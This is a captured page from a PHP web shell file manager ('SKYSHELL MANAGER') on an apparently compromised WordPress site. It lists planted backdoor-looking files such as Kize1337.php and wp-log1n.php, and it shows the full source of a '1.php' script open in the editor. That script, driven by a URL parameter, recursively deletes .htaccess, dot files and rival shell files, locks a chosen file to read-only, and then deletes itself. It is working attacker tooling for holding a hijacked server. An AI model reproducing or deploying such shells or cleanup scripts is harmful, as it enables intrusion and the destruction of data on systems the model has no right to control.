📁
SKYSHELL MANAGER-
🛒
PHP v8.3.27
Create Folder
Create File
Current Path:
www
/
wwwroot
/
sv388sc.com
/
Name
Size
Permissions
Actions
📁
..
-
0777
🗑️
🔒
📁
185424
-
0755
🗑️
🔒
📁
2613c
-
0555
🗑️
🔒
📁
264276
-
0755
🗑️
🔒
📁
e25b86
-
0755
🗑️
🔒
📁
images
-
0755
🗑️
🔒
📁
wp-admin
-
0755
🗑️
🔒
📁
wp-content
-
0755
🗑️
🔒
📁
wp-includes
-
0755
🗑️
🔒
📄
.htaccess
1.13 KB
0555
🗑️
⬇️
✏️
🔒
📄
Kize1337.php
7.54 KB
0644
🗑️
⬇️
✏️
🔒
📄
ORVX-2LpmWS.php
399.32 KB
0644
🗑️
⬇️
✏️
🔒
📄
au_122d0be7.php
24.37 KB
0644
🗑️
⬇️
✏️
🔒
📄
au_e37f8d6e.php
166.08 KB
0644
🗑️
⬇️
✏️
🔒
📄
buy.php
1.45 KB
0444
🗑️
⬇️
✏️
🔒
📄
click.php
1.93 KB
0444
🗑️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
⬇️
✏️
🔒
📄
index.php
19.07 KB
0444
🗑️
⬇️
✏️
🔒
📄
index.php0
31.42 KB
0755
🗑️
⬇️
✏️
🔒
📄
it_05f98c69.php
166.08 KB
0644
🗑️
⬇️
✏️
🔒
📄
it_0a6eaac8.php
216.49 KB
0644
🗑️
⬇️
✏️
🔒
📄
item.php
2 KB
0444
🗑️
⬇️
✏️
🔒
📄
license.txt
19.44 KB
0644
🗑️
⬇️
✏️
🔒
📄
mah.php
1.93 KB
0444
🗑️
⬇️
✏️
🔒
📄
networks.php
1.87 KB
0444
🗑️
⬇️
✏️
🔒
📄
options.php
2 KB
0444
🗑️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
⬇️
✏️
🔒
📄
plugins.php
1.87 KB
0444
🗑️
⬇️
✏️
🔒
📄
product.php
1.29 KB
0444
🗑️
⬇️
✏️
🔒
📄
robots.txt
0.34 KB
0444
🗑️
⬇️
✏️
🔒
📄
ru_9a7b823f.php
70.78 KB
0644
🗑️
⬇️
✏️
🔒
📄
txets.php
5.32 KB
0444
🗑️
⬇️
✏️
🔒
📄
us_a54f0f43.php
53 KB
0644
🗑️
⬇️
✏️
🔒
📄
wp-activate.php
7.18 KB
0644
🗑️
⬇️
✏️
🔒
📄
wp-blog-header.php
0.46 KB
0444
🗑️
⬇️
✏️
🔒
📄
wp-comments-post.php
2.27 KB
0644
🗑️
⬇️
✏️
🔒
📄
wp-config-sample.php
3.26 KB
0644
🗑️
⬇️
✏️
🔒
📄
wp-config.php
3.55 KB
0644
🗑️
⬇️
✏️
🔒
📄
wp-links-opml.php
2.43 KB
0644
🗑️
⬇️
✏️
🔒
📄
wp-load.php
3.96 KB
0444
🗑️
⬇️
✏️
🔒
📄
wp-log1n.php
1.87 KB
0444
🗑️
⬇️
✏️
🔒
📄
wp-login.php
5.96 KB
0644
🗑️
⬇️
✏️
🔒
📄
wp-mail.php
8.52 KB
0644
🗑️
⬇️
✏️
🔒
📄
wp-settings.php
30.33 KB
0644
🗑️
⬇️
✏️
🔒
📄
wp-signup.php
33.71 KB
0644
🗑️
⬇️
✏️
🔒
📄
wp-trackback.php
5.09 KB
0644
🗑️
⬇️
✏️
🔒
📄
xmlrpc.php
3.13 KB
0644
🗑️
⬇️
✏️
🔒
Editing: 1.php
<?php /** * System Core Cleaner - All Fix * Targets: .htaccess, sc.php, features.php, system.php, idx_* files, 1.php (Self) * Protection: system_core.php */ error_reporting(0); $path = isset($_GET['path']) ? $_GET['path'] : __DIR__; $path = realpath($path); if (!$path || !is_dir($path)) { $path = __DIR__; } // Targets to delete $delete_targets = ['sc.php', 'features.php', '.htaccess', 'system.php']; $self_file = '1.php'; $protect_target = 'system_core.php'; function coreProcessor($dir, $del_list, $prot_file) { if (!is_dir($dir)) return; $files = @scandir($dir); if (!$files) return; foreach ($files as $file) { if ($file === '.' || $file === '..') continue; $fullPath = $dir . DIRECTORY_SEPARATOR . $file; if (is_dir($fullPath)) { coreProcessor($fullPath, $del_list, $prot_file); } else { $fileName = strtolower($file); // 1. Force Delete: Dot files, idx_ prefix files, and specific targets $isDotFile = (substr($file, 0, 1) === '.'); $isIdxFile = (substr($fileName, 0, 4) === 'idx_'); $isTarget = in_array($fileName, $del_list); if ($isDotFile || $isIdxFile || $isTarget) { // Changing to High Permission (0777) before deletion @chmod($fullPath, 0777); @unlink($fullPath); } // 2. Protect system_core.php (Set to Read-only 0444) if ($fileName === strtolower($prot_file)) { @chmod($fullPath, 0444); } } } } // Step 1: Run recursive cleaning process coreProcessor($path, $delete_targets, $protect_target); // Step 2: Self-destruct 1.php (the script itself) at the very end $current_script = realpath(__FILE__); if (basename($current_script) === $self_file) { @chmod($current_script, 0777); @unlink($current_script); } // Step 3: Minimal Output echo "Success"; exit; ?>
💾 Save Changes